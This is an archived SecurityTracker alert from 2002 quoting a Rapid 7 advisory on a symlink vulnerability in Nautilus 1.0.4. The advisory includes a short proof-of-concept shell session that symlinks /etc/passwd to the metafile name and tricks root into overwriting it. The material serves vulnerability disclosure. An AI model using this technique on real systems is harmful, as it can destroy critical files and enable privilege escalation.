Nautilus GNOME Shell and File Manager Symlink Hole May Let Local Users Cause Other Users' to Overwrite Files on the System
SecurityTracker Alert ID: 1004212|
SecurityTracker URL: http://securitytracker.com/id/1004212
(Links to External Site)
Date: May 2 2002
Modification of system information, Modification of user information, Root access via local system, User access via local system|
Fix Available: Yes Vendor Confirmed: Yes |
A temporary file symbolic link (symlink) vulnerability was reported in Nautilus, the GNOME shell and file manager. A local user could cause another user to overwrite files on the system. In some cases, this could allow a local user to obtain root privileges on the system.|
Rapid 7 reports that when a local user copies files from one directory to another directory, Nautilus will create a small (88+ bytes) XML file named '.nautilus-metafile.xml' in the target directory. The software apparently does not check to see if a symlink with the same name already exists before writing to it.
A local user could create a symlink from a critical file to the appropriate Nautilus XML file name in a certain directory. Then, the local user could convince another user on the system to copy a file to the certain directory. When the other user performs this copy function using Nautilus, Nautilus will write to the XML file, causing the linked file to be overwritten with the privileges of the other user.
A local user can cause files to be overwritten by other users when the other users invoke Nautilus to perform certain copying functions. If the "other user" is a root-level user, then the local user could obtain root level access on the system.|
The vendor has reportedly released a fix in CVS. Download a more recent version from:|
Vendor URL: nautilus.eazel.com/ (Links to External Site)
Access control error, State error|
|Underlying OS: Linux (Any), UNIX (Any)|
This archive entry has one or more follow-up message(s) listed below.|
Source Message Contents
Subject: Nautilus Symlink Vulnerability|
Rapid 7, Inc. Security Advisory
Visit http://www.rapid7.com/ to download NeXpose(tm), our
advanced vulnerability scanner. Linux and Windows 2000
versions are available now!
Rapid 7 Advisory R7-000x: Nautilus Symlink Vulnerability
Published: Not yet published.
CVE ID: CAN-2002-0157
Bugtraq ID: Not yet assigned.
1. Affected system(s):
o Nautilus 1.0.4
Apparently NOT VULNERABLE:
Nautilus is a graphical shell for GNOME. It contains a
which would allow a malicious user to mount a symlink attack to
another user's files.
The Common Vulnerabilities and Exposures (CVE) project has assigned
the identifier CAN-2002-0157 to this issue. This is a candidate for
inclusion in the CVE list (http://cve.mitre.org/), which
names for security problems.
BUGTRAQ has assigned the identifier xxx to this vulnerability.
More information on BUGTRAQ can be found at
3. Vendor status and information
Vendor notified 03/26/2002.
5. Detailed analysis
When copying files from one directory to another, Nautilus creates a
(88+ bytes) XML file called '.nautilus-metafile.xml' in the target
directory. It does not check if a symlink with the same name
exists there, and blindly writes XML data to it. The following
shows how to cause a system-wide denial of service attack with this
[jdog@imisshogs jdog]$ pwd
[jdog@imisshogs jdog]$ cat /etc/passwd
[jdog@imisshogs jdog]$ ln -s /etc/passwd .nautilus-metafile.xml
[jdog@imisshogs jdog]$ mail root
Could you please copy "lonely-in-new-york.doc" to my home
[jdog@imisshogs jdog]$ sleep 86400
[jdog@imisshogs jdog]$ ls -l *.doc
-rw-r--r-- 1 root root 13 Mar 24 18:09
[jdog@imisshogs jdog]$ cat /etc/passwd
<file name="lonely-in-new-york.doc" icon_position="55,105"/>
6. Contact Information
Rapid 7 Security Advisories
Phone: +1 (212) 558-8700
7. Disclaimer and Copyright
Rapid 7, Inc. is not responsible for the misuse of the information
provided in our security advisories. These advisories are a service
to the professional security community. There are NO WARRANTIES
with regard to this information. Any application or distribution of
this information constitutes acceptance AS IS, at the user's own
risk. This information is subject to change without notice.
This advisory Copyright (C) 2002 Rapid 7, Inc. Permission is
hereby granted to redistribute this advisory in electronic media
only, providing that no changes are made and that the copyright
notices and disclaimers remain intact. This advisory may not be
printed or distributed in non-electronic media without the
express written permission of Rapid 7, Inc.